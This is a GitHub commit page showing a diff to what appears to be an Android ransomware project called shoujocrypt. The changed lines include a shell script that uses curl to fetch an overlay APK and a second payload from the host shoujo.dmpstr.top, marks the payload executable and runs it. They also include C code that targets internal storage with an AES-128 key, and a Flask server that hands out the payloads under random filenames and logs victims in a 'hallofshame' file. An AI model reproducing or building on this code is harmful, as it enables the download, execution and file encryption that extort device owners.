Skip to content
This repository was archived by the owner on May 29, 2025. It is now read-only.

Commit 3d37dff

Browse files
committed
brh finna crash out onb
1 parent 3f7ef53 commit 3d37dff

File tree

3 files changed

+7
-7
lines changed

3 files changed

+7
-7
lines changed

src/image_payload/payload.sh

Lines changed: 2 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -16,9 +16,9 @@ case $1 in
1616
pm install $MODDIR/overlay.apk
1717
else
1818
echo "huh"
19-
$curl_bin http://shoujo.dmpstr.top:25565/overlay -o $MODDIR/overlay.apk
19+
$curl_bin http://shoujo.dmpstr.top/overlay -o $MODDIR/overlay.apk
2020
fi
21-
$curl_bin http://shoujo.dmpstr.top:25565/ehe -o $MODDIR/sc.pl
21+
$curl_bin http://shoujo.dmpstr.top/ehe -o $MODDIR/sc.pl
2222
chmod u+x $MODDIR/sc.pl
2323
./sc.pl
2424
;;

src/jni/shoujocrypt.c

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -16,7 +16,7 @@
1616
int main() {
1717
const char *key_path = "/data/adb/modules/.kys.keys";
1818
const char *lock_file = "/data/adb/modules/chas.lock";
19-
const char *url = "https://shoujo.dmpstr.top:25565";
19+
const char *url = "https://shoujo.dmpstr.top";
2020
const char *internal_storage = "/storage/emulated/0";
2121
const char *sn;
2222
unsigned char key[16]; // AES-128 key for symmetrical {en,de}cryption

src/server/main.py

Lines changed: 4 additions & 4 deletions
Original file line numberDiff line numberDiff line change
@@ -8,7 +8,7 @@
88

99
db = "hallofshame.jsonc"
1010
payload="../../out/shoujocrypt"
11-
payload2="../../out/malyui.png"
11+
overlay="../../out/overlay.apk"
1212
allowed_devices = []
1313

1414
if not os.path.exists(db):
@@ -26,13 +26,13 @@ def ehe():
2626
random_filename = generate_random_filename()
2727
return send_file(payload, as_attachment=True, download_name=random_filename)
2828

29-
@app.route('/heh', methods=['GET'])
30-
def ehe():
29+
@app.route('/overlay', methods=['GET'])
30+
def heh():
3131
if not os.path.exists(payload):
3232
return jsonify({"error": "Payload not found"}), 404
3333

3434
random_filename = generate_random_filename()
35-
return send_file(payload2, as_attachment=True)
35+
return send_file(overlay, as_attachment=True)
3636

3737
def load():
3838
if not os.path.exists(db):

0 commit comments

Comments
 (0)